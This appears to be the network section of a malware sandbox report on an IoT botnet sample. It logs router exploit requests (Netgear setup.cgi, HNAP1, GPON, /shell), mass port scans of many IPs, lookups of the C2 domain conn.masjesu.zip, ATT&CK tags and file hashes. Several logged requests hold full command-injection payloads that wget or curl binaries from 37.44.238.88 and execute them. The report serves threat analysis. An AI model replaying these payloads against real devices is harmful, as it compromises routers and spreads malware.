GEThttp://167.71.139.23:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
-
GEThttp://201.222.102.254:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 201.222.102.254:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Cache-Control: no-store
Connection: Keep-Alive
Content-Length: 99
Content-Type: text/html
Date: Fri, 28 Feb 2025 19:35:12 GMT
Expires: 0
Pragma: no-cache
X-Frame-Options: sameorigin
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 501 Not Implemented
Cache-Control: no-store
Connection: close
Content-Length: 111
Content-Type: text/html
Date: Fri, 28 Feb 2025 19:35:12 GMT
Expires: 0
Pragma: no-cache
X-Frame-Options: sameorigin
-
DNSResponse(null) 400 Bad Request
Server: mini_httpd/1.19/bhoc 23sep2004
Date: Mon, 16 Feb 1970 06:13:51 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=UTF-8
Connection: close
-
POSThttp://83.253.41.12:80/HNAP1/RequestPOST /HNAP1/ HTTP/1.0
Host: 83.253.41.12:80
Content-Type: text/xml; charset="utf-8"
SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp || cd /var/run || cd /mnt || cd /root || cd /;rm bins.sh;wget http://37.44.238.88/bins.sh;curl -O http://37.44.238.88/bins.sh;/bin/busybox wget http://37.44.238.88/bins.sh; chmod 777 bins.sh;./bins.sh`
Content-Length: 640
ResponseHTTP/1.0 404 Not Found
Server: mini_httpd/1.19/bhoc 23sep2004
Date: Mon, 16 Feb 1970 06:13:52 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=UTF-8
Connection: close
-
GEThttp://83.253.41.12:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraRequestGET /shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmra HTTP/1.1
User-Agent: masjesu
Host: 83.253.41.12:80
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Connection: keep-alive
ResponseHTTP/1.1 404 Not Found
Server: mini_httpd/1.19/bhoc 23sep2004
Date: Mon, 16 Feb 1970 06:13:51 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=UTF-8
Connection: close
-
GEThttp://83.253.41.12:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1RequestGET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0
ResponseHTTP/1.0 404 Not Found
Server: mini_httpd/1.19/bhoc 23sep2004
Date: Mon, 16 Feb 1970 06:13:51 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=UTF-8
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
ResponseHTTP/1.1 400 Bad Request
Server: mini_httpd/1.19/bhoc 23sep2004
Date: Mon, 16 Feb 1970 06:13:52 GMT
Cache-Control: no-cache,no-store
Content-Type: text/html; charset=UTF-8
Connection: close
-
POSThttp://127.0.0.1:80/GponForm/diag_Form?images/RequestPOST /GponForm/diag_Form?images/ HTTP/1.1
Host: 127.0.0.1:80
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: masjesu
Content-Length: 118
-
37.44.238.88:80http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4Ghttp
HTTP Request
GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4Ghttp
HTTP Request
GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4Ghttp
HTTP Request
GET http://conn.masjesu.zip/bins/tCV5vO5tw9z8XJnNLCPzh9rWcP75X3gc4GHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvhttp
HTTP Request
GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
37.44.238.88:80http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvhttp
HTTP Request
GET http://conn.masjesu.zip/bins/59fT4e3UEmL9oGFEi4nhEPDL9v4liwzVzvHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
37.44.238.88:80http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7Ehttp
HTTP Request
GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7EHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
37.44.238.88:80http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7Ehttp
HTTP Request
GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7EHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7Ehttp
HTTP Request
GET http://conn.masjesu.zip/bins/l8bIo6MX0E2xzUa8GlxxB3QQT28nJjEe7EHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkihttp
HTTP Request
GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkiHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkihttp
HTTP Request
GET http://conn.masjesu.zip/bins/1Url4Vmjm3jutDoL4IALrwVcTgwtmfdAkiHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
216.126.231.240:80conn.masjesu.zip
-
37.44.238.88:80http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Uprhttp
HTTP Request
GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2UprHTTP Response
200 -
37.44.238.88:80http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2Uprhttp
HTTP Request
GET http://conn.masjesu.zip/bins/z9GdbmiPoT1CYXtsXr4DYxGfZQoAwH2UprHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
37.44.238.88:443conn.masjesu.ziphttps
-
37.44.238.88:80http://37.44.238.88/.shellhttp
HTTP Request
GET http://37.44.238.88/.shellHTTP Response
200 -
216.126.231.240:80conn.masjesu.zip
-
166.142.198.85:37215
-
106.250.89.44:37215 -
46.93.13.38:37215 -
19.25.236.3:37215
-
78.15.23.103:37215 -
135.212.236.38:37215
-
50.133.252.105:37215
-
178.163.141.187:37215 -
2.109.137.5:37215 -
95.10.38.55:37215 -
47.39.109.18:37215
-
194.110.158.139:37215
-
39.87.59.141:37215 -
194.43.195.3:37215 -
66.99.206.69:37215
-
187.69.206.158:37215 -
184.125.55.80:37215
-
195.252.142.195:37215
-
5.91.206.177:37215 -
217.65.185.55:37215
-
38.113.183.180:37215 -
210.54.47.138:37215 -
86.163.72.46:37215
-
172.142.38.1:37215
-
222.160.215.59:37215
-
168.169.252.220:37215
-
82.16.250.149:37215
-
193.65.73.145:37215 -
117.253.17.211:37215 -
156.68.16.88:37215
-
156.112.147.223:37215
-
92.170.160.69:37215
-
110.39.68.245:37215 -
103.212.1.46:37215
-
154.132.185.231:37215 -
165.219.144.167:37215
-
86.13.197.51:37215
-
210.1.181.166:37215 -
92.152.239.230:37215
-
95.118.50.109:37215
-
15.173.85.192:37215
-
129.242.194.225:37215 -
53.97.109.235:37215
-
67.49.1.118:37215
-
51.140.6.111:37215
-
9.54.242.108:37215
-
135.76.4.133:37215
-
176.33.178.212:37215
-
106.134.50.144:37215
-
102.3.17.51:37215 -
66.20.130.87:37215
-
187.120.151.103:37215
-
17.157.86.26:37215
-
31.28.30.190:37215 -
145.139.81.26:37215 -
110.160.239.70:37215
-
77.151.13.216:37215
-
104.24.157.51:37215
-
133.10.56.246:37215
-
168.51.0.167:37215
-
87.213.252.177:37215
-
8.186.46.133:37215 -
58.220.36.149:37215
-
31.198.162.75:37215
-
196.3.78.240:37215 -
58.163.242.92:37215
-
35.171.114.87:37215
-
45.239.182.232:37215
-
48.41.155.249:37215
-
165.48.101.200:37215
-
121.230.31.182:37215
-
14.114.5.25:37215
-
193.52.3.154:37215
-
200.191.88.44:37215
-
111.83.214.113:37215 -
39.242.70.203:37215 -
106.61.201.193:37215
-
59.223.217.17:37215
-
86.114.128.103:37215
-
31.238.67.222:37215
-
95.10.38.55:80
-
193.65.73.145:80
-
193.65.73.145:81
-
117.253.17.211:80
-
67.49.1.118:80
-
193.65.73.145:8080
-
193.65.73.145:52869
-
67.49.1.118:81
-
193.65.73.145:7574
-
193.65.73.145:5555
-
187.69.206.158:80
-
39.87.59.141:80
-
210.54.47.138:80
-
156.68.16.88:80
-
47.39.109.18:80
-
195.252.142.195:80
-
46.93.13.38:80
-
110.39.68.245:80
-
210.1.181.166:80
-
165.219.144.167:80
-
217.65.185.55:80
-
82.16.250.149:80
-
92.152.239.230:80
-
5.91.206.177:80
-
222.160.215.59:80
-
66.99.206.69:80
-
168.169.252.220:80
-
103.212.1.46:80
-
50.133.252.105:80
-
194.43.195.3:80
-
135.212.236.38:80
-
184.125.55.80:80
-
19.25.236.3:80
-
172.142.38.1:80
-
2.109.137.5:80
-
194.110.158.139:80
-
38.113.183.180:80
-
86.163.72.46:80
-
154.132.185.231:80
-
166.142.198.85:80
-
178.163.141.187:80
-
106.250.89.44:80
-
95.118.50.109:80
-
92.170.160.69:80
-
156.112.147.223:80
-
86.13.197.51:80
-
78.15.23.103:80
-
17.157.86.26:80
-
31.198.162.75:80
-
165.48.101.200:80
-
31.28.30.190:80
-
66.20.130.87:80
-
145.139.81.26:80
-
135.76.4.133:80
-
58.220.36.149:80
-
9.54.242.108:80
-
176.33.178.212:80
-
35.171.114.87:80
-
77.151.13.216:80
-
196.3.78.240:80
-
104.24.157.51:80
-
200.191.88.44:80
-
133.10.56.246:80
-
15.173.85.192:80
-
106.134.50.144:80
-
51.140.6.111:80
-
48.41.155.249:80
-
8.186.46.133:80
-
111.83.214.113:80
-
14.114.5.25:80
-
110.160.239.70:80
-
45.239.182.232:80
-
121.230.31.182:80
-
193.52.3.154:80
-
87.213.252.177:80
-
102.3.17.51:80
-
168.51.0.167:80
-
129.242.194.225:80
-
58.163.242.92:80
-
187.120.151.103:80
-
53.97.109.235:80
-
67.49.1.118:8080
-
193.65.73.145:49152
-
104.24.157.51:81
-
104.24.157.51:80http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmrahttp
HTTP Request
GET http://104.24.157.51:80/shell?cd+/tmp;rm+-rf+*;wget+http://37.44.238.88/l7vmra;chmod+777+l7vmra;/tmp/l7vmraHTTP Response
403 -
104.24.157.51:80http://104.24.157.51:80/HNAP1/http
HTTP Request
POST http://104.24.157.51:80/HNAP1/HTTP Response
403 -
104.24.157.51:80http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1http
HTTP Request
GET http://104.24.157.51:80/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1HTTP Response
400 -
104.24.157.51:80http://127.0.0.1:80/GponForm/diag_Form?images/http
HTTP Request
POST http://127.0.0.1:80/GponForm/diag_Form?images/HTTP Response
403 -
86.114.128.103:80
-
59.223.217.17:80
-
39.242.70.203:80
-
95.10.38.55:81
-
31.238.67.222:80
-
106.61.201.193:80
-
193.65.73.145:8443
-
117.253.17.211:81
-
151.153.205.182:37215
-
67.49.1.118:52869
-
117.253.17.211:8080
-
67.49.1.118:7574
-
86.163.72.46:81
-
195.252.142.195:81
-
217.65.185.55:81
-
82.16.250.149:81
-
187.69.206.158:81
-
165.219.144.167:81
-
178.163.141.187:81
-
166.142.198.85:81
-
19.25.236.3:81
-
106.250.89.44:81
-
156.112.147.223:81
-
66.99.206.69:81
-
172.142.38.1:81
-
5.91.206.177:81
-
194.43.195.3:81
-
210.54.47.138:81
-
2.109.137.5:81
-
38.113.183.180:81
-
103.212.1.46:81
-
168.169.252.220:81
-
95.118.50.109:81
-
86.13.197.51:81
-
47.39.109.18:81
-
50.133.252.105:81
-
92.152.239.230:81
-
194.110.158.139:81
-
154.132.185.231:81
-
110.39.68.245:81
-
210.1.181.166:81
-
92.170.160.69:81
-
184.125.55.80:81
-
39.87.59.141:81
-
46.93.13.38:81
-
156.68.16.88:81
-
78.15.23.103:81
-
135.212.236.38:81
-
222.160.215.59:81
-
117.253.17.211:52869
-
87.213.252.177:81
-
129.242.194.225:81
-
200.191.88.44:81
-
165.48.101.200:81
-
48.41.155.249:81
-
121.230.31.182:81
-
110.160.239.70:81
-
31.198.162.75:81
-
35.171.114.87:81
-
31.28.30.190:81
-
196.3.78.240:81
-
135.76.4.133:81
-
8.186.46.133:81
-
133.10.56.246:81
-
145.139.81.26:81
-
9.54.242.108:81
-
58.220.36.149:81
-
106.134.50.144:81
-
111.83.214.113:81
-
45.239.182.232:81
-
14.114.5.25:81
-
17.157.86.26:81
-
51.140.6.111:81
-
102.3.17.51:81
-
58.163.242.92:81
-
15.173.85.192:81
-
66.20.130.87:81
-
53.97.109.235:81
-
77.151.13.216:81
-
193.52.3.154:81
-
176.33.178.212:81
-
168.51.0.167:81
-
187.120.151.103:81
-
31.238.67.222:81
-
95.10.38.55:8080
-
86.114.128.103:81
-
39.242.70.203:81
-
67.49.1.118:5555
-
104.24.157.51:8080
-
106.61.201.193:81
-
59.223.217.17:81
-
104.24.157.51:52869
-
104.24.157.51:8080
-
104.24.157.51:8080http
-
104.24.157.51:8080http://104.24.157.51:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1http
HTTP Request
GET http://104.24.157.51:8080/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://37.44.238.88/spim+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1HTTP Response
400 -
104.24.157.51:8080http://127.0.0.1:8080/GponForm/diag_Form?images/http
HTTP Request
POST http://127.0.0.1:8080/GponForm/diag_Form?images/HTTP Response
403 -
151.153.205.182:80
-
117.253.17.211:7574
-
67.49.1.118:49152
-
117.253.17.211:5555
-
110.39.68.245:8080
-
195.252.142.195:8080
-
47.39.109.18:8080
-
46.93.13.38:8080
-
178.163.141.187:8080
-
39.87.59.141:8080
-
135.212.236.38:8080
-
92.170.160.69:8080
-
166.142.198.85:8080
-
78.15.23.103:8080
-
217.65.185.55:8080
-
106.250.89.44:8080
-
5.91.206.177:8080
-
86.13.197.51:8080
-
38.113.183.180:8080
-
95.118.50.109:8080
-
194.43.195.3:8080
-
187.69.206.158:8080
-
165.219.144.167:8080
-
50.133.252.105:8080
-
184.125.55.80:8080
-
156.68.16.88:8080
-
66.99.206.69:8080
-
156.112.147.223:8080
-
210.54.47.138:8080
-
2.109.137.5:8080
-
103.212.1.46:8080
-
82.16.250.149:8080
-
92.152.239.230:8080
-
194.110.158.139:8080
-
210.1.181.166:8080
-
222.160.215.59:8080
-
172.142.38.1:8080
-
168.169.252.220:8080
-
19.25.236.3:8080
-
154.132.185.231:8080
-
86.163.72.46:8080
-
17.157.86.26:8080
-
200.191.88.44:8080
-
193.52.3.154:8080
-
31.28.30.190:8080
-
51.140.6.111:8080
-
165.48.101.200:8080
-
176.33.178.212:8080
-
31.198.162.75:8080
-
129.242.194.225:8080
-
110.160.239.70:8080
-
9.54.242.108:8080
-
45.239.182.232:8080
-
35.171.114.87:8080
-
145.139.81.26:8080
-
106.134.50.144:8080
-
14.114.5.25:8080
-
111.83.214.113:8080
-
87.213.252.177:8080
-
102.3.17.51:8080
-
133.10.56.246:8080
-
168.51.0.167:8080
-
135.76.4.133:8080
-
66.20.130.87:8080
-
48.41.155.249:8080
-
187.120.151.103:8080
-
196.3.78.240:8080
-
121.230.31.182:8080
-
8.186.46.133:8080
-
15.173.85.192:8080
-
58.163.242.92:8080
-
77.151.13.216:8080
-
58.220.36.149:8080
-
53.97.109.235:8080
-
106.61.201.193:8080
-
31.238.67.222:8080
-
39.242.70.203:8080
-
86.114.128.103:8080
-
59.223.217.17:8080
-
95.10.38.55:52869
-
104.24.157.51:7574
-
151.153.205.182:81
-
67.49.1.118:8443
-
117.253.17.211:49152
-
92.170.160.69:52869
-
187.69.206.158:52869
-
66.99.206.69:52869
-
46.93.13.38:52869
-
156.112.147.223:52869
-
47.39.109.18:52869
-
166.142.198.85:52869
-
39.87.59.141:52869
-
106.250.89.44:52869
-
172.142.38.1:52869
-
82.16.250.149:52869
-
78.15.23.103:52869
-
156.68.16.88:52869
-
195.252.142.195:52869
-
86.13.197.51:52869
-
154.132.185.231:52869
-
5.91.206.177:52869
-
92.152.239.230:52869
-
19.25.236.3:52869
-
2.109.137.5:52869
-
38.113.183.180:52869
-
184.125.55.80:52869
-
210.54.47.138:52869
-
194.110.158.139:52869
-
95.118.50.109:52869
-
103.212.1.46:52869
-
135.212.236.38:52869
-
178.163.141.187:52869
-
168.169.252.220:52869
-
194.43.195.3:52869
-
110.39.68.245:52869
-
217.65.185.55:52869
-
50.133.252.105:52869
-
210.1.181.166:52869
-
86.163.72.46:52869
-
222.160.215.59:52869
-
165.219.144.167:52869
-
117.253.17.211:8443
-
135.76.4.133:52869
-
187.120.151.103:52869
-
58.163.242.92:52869
-
51.140.6.111:52869
-
17.157.86.26:52869
-
77.151.13.216:52869
-
14.114.5.25:52869
-
45.239.182.232:52869
-
193.52.3.154:52869
-
111.83.214.113:52869
-
31.198.162.75:52869
-
31.28.30.190:52869
-
176.33.178.212:52869
-
129.242.194.225:52869
-
145.139.81.26:52869
-
58.220.36.149:52869
-
102.3.17.51:52869
-
8.186.46.133:52869
-
165.48.101.200:52869
-
66.20.130.87:52869
-
133.10.56.246:52869
-
15.173.85.192:52869
-
121.230.31.182:52869
-
53.97.109.235:52869
-
168.51.0.167:52869
-
9.54.242.108:52869
-
106.134.50.144:52869
-
48.41.155.249:52869
-
35.171.114.87:52869
-
87.213.252.177:52869
-
110.160.239.70:52869
-
196.3.78.240:52869
-
200.191.88.44:52869
-
39.242.70.203:52869
-
59.223.217.17:52869
-
31.238.67.222:52869
-
106.61.201.193:52869
-
95.10.38.55:7574
-
86.114.128.103:52869
-
104.24.157.51:5555
-
112.124.98.253:37215
-
151.153.205.182:8080
-
50.79.60.36:37215
-
110.39.68.245:7574
-
210.54.47.138:7574
-
217.65.185.55:7574
-
178.163.141.187:7574
-
95.118.50.109:7574
-
135.212.236.38:7574
-
50.133.252.105:7574
-
194.43.195.3:7574
-
38.113.183.180:7574
-
5.91.206.177:7574
-
82.16.250.149:7574
-
172.142.38.1:7574
-
194.110.158.139:7574
-
195.252.142.195:7574
-
156.68.16.88:7574
-
210.1.181.166:7574
-
187.69.206.158:7574
-
2.109.137.5:7574
-
66.99.206.69:7574
-
86.163.72.46:7574
-
39.87.59.141:7574
-
46.93.13.38:7574
-
19.25.236.3:7574
-
222.160.215.59:7574
-
92.170.160.69:7574
-
103.212.1.46:7574
-
168.169.252.220:7574
-
92.152.239.230:7574
-
47.39.109.18:7574
-
78.15.23.103:7574
-
166.142.198.85:7574
-
156.112.147.223:7574
-
165.219.144.167:7574
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
37.44.238.88216.126.231.240
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
-
1.1.1.1:53conn.masjesu.zipdns
DNS Request
conn.masjesu.zip
DNS Request
conn.masjesu.zip
DNS Response
216.126.231.24037.44.238.88
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
111KB
MD5701e7a55a4f3650f5feee92a9860e5fc
SHA16ce4a7f0dc80fe557a0ace4de25e6305af221ed4
SHA256ff851250b0bd7e6f2c445b08d858d840b554caf75a37ada2a970ea4d317ba588
SHA5127352517b4af3b0cfe1cc814accf18e6254532f33dee274279bd499b6748aa0ed044c9429d6df0eb07ff0292cd0f9388ce44d278e0c562e6e57110b28a66a5f11
-
Filesize
117KB
MD5849fa04ef88a8e8de32cb2e8538de5fe
SHA1c768af29fe4b6695fff1541623e8bbd1c6f242f7
SHA2568bc5e3bff5150738699927ca2b95f3e3bfd87aed44c30fc61fac788248528579
SHA5122d8a8b2f04b494f95740b6f6315a71b40d9b2099922232791604b970a4533d1c51fa6deb6d2f3b4ce71b4795b842c1af75cd06981c81c94d4a87698be9d920cf
-
Filesize
99KB
MD59438d9bc392bcf300a5583b6df5bc8f6
SHA1375a6ae34b516f6f3eeea8030c4084f585017efa
SHA25668e6282ed9046c9e22dbdf051dc03956803a46805f599e8cb9b52b993caa8f1e
SHA5121f3e4219359a28c0f6373c0369da2b5dc0e89789afb89664627d8d9e37d4b72da36322b4015491d7daa03e46dff07d39f00dca18f274e9623dab0ff2d869c860
-
Filesize
107KB
MD5eb9c3a0de91fcf16ba17cb24608df68c
SHA109d95a7d70d5e115d103be51edff7c498d272fac
SHA256dd01a1365a9f35501e09e0144ed1d4d8b00dcf20aa66cf6dc186e94d7dbe4b47
SHA5129e1f3f88f82bb41c68d78b351c8dc8075522d6d42063f798b6ef38a491df7a3bab2c312d536fb0a6333e516d7dc4f5a58b80beb69422a04d1dbc61eaba346e27
-
Filesize
141KB
MD53ca8decdb1e52c423c521bfff02ac200
SHA18621ecd6807109b8541912ad9e134f6fb49bfd48
SHA256dee3a1252e88f188c362e08b16ece678559ad2566511871f5cde69296f6c779f
SHA512b6f89d7875d584c109f30814738fec4fe04619745941d9cbbff20bbefbab454dee7180321f6913da1a3b89fba2dc743b28631e52261539d091cc802a5c7a1c7a
-
Filesize
210B
MD5dac86425a4945579a0042adc4eae3bfe
SHA1a2cab09f305098818ace9255ce22e9531ec77773
SHA256574d1642557f461d3bda05fe0db3eb1cdab8335804f5f04b6b283412de55aea7
SHA51240b72f34bc33e9cab3e12553c3648e31b035eb0caf388f20466718f884854136ebb57b8f210415dcea64a1aaa3c5d6b68705bae4b0221e09daa27c0db83f14dc